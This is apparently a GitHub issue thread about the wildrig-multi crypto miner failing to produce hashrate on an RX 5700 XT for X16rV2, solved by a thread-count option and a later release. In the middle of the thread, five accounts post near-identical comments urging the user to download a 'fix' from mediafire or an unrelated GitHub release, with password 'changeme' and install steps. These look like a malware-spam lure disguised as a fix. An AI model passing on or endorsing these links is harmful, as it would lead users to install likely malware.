### ISSUE TITLE
v0.40.8 (Windows): Error mining X16rV2 @ NiceHash with RX5700

### ISSUE THREAD

**Issue by UselessGuru** [andru-kun/wildrig-multi#303]
`Bin\Wildrig-v0.40.8\wildrig.exe --algo x16rv2 --api-port 4005 --url stratum+tcps://x16rv2.auto.nicehash.com:443 --user #####################.############## --pass x --multiple-instance --opencl-platform 1 --opencl-devices 0
`
Miner connects successfully, but never produces any hashrate.

```
[19:11:18] Initializing GPUs...
[19:11:18] GPU #0: AMD Radeon RX 5700 XT [busID: 8] [arch: gfx1010]
[19:11:18] threads: 2, intensity: 19, cu: 40, mem: 8176Mb
[19:11:19] Start mining
[19:11:19] use pool x16rv2.auto.nicehash.com:443 34.111.213.200
[19:11:19] Stratum set raw difficulty to 8.0000
[19:11:19] new job from x16rv2.auto.nicehash.com:443 diff 134.22M/586.81G
[19:11:19] block: 1,153,972     job target: 0x0000001fffe00000
[19:11:19] hash order:
[19:11:19] SknEchBmwTigLufShvCubGroWrlSknSknCubJh5ShbBlkShvSkn
[19:11:25] new job from x16rv2.auto.nicehash.com:443 diff 134.22M/551.32G
[19:11:25] block: 1,153,973     job target: 0x0000001fffe00000
[19:11:25] hash order:
[19:11:25] Jh5HamTigShaTigShaJh5TigLufFugJh5ShvBmwTigKckEchSmdFugEchShv
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫Statistics┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ID Name                         Hashrate Temp  Fan  Pwr   Eff CClk MClk     A   R   I
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 #0 Radeon RX 5700 XT           0.38 MH/s  51C  24%  86W 0.004 1681  998     -   -   -
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 10s:                           0.38 MH/s Power:     86W            Accepted:        -
 60s:                            n/a MH/s                           Rejected:        -
 15m:                            n/a MH/s                           Ignored:         -
┫0 days 00:00:59┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[19:12:18] new job from x16rv2.auto.nicehash.com:443 diff 134.22M/551.32G
[19:12:18] block: 1,153,973     job target: 0x0000001fffe00000
[19:12:18] hash order:
[19:12:18] Jh5HamTigShaTigShaJh5TigLufFugJh5ShvBmwTigKckEchSmdFugEchShv
```

Other algos are working fine. Also same commandline on RX580 wors well too. AFAIK The problem is with RX5700 only.

**Comment by andru-kun** [comment]
remind me please what version of drivers do you use?

**Comment by UselessGuru** [comment]
> remind me please what version of drivers do you use?

I am using whql-amd-software-adrenalin-edition-23.4.3-win10-win11-apr27.exe

> Also what if try parameter --opencl-threads 1?

This works.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by UselessGuru** [comment]
Issue is still present in 0.40.9 if '--opencl-threads 1' is NOT set.

**Comment by UselessGuru** [comment]
Can no longer reproduce in 0.41.2
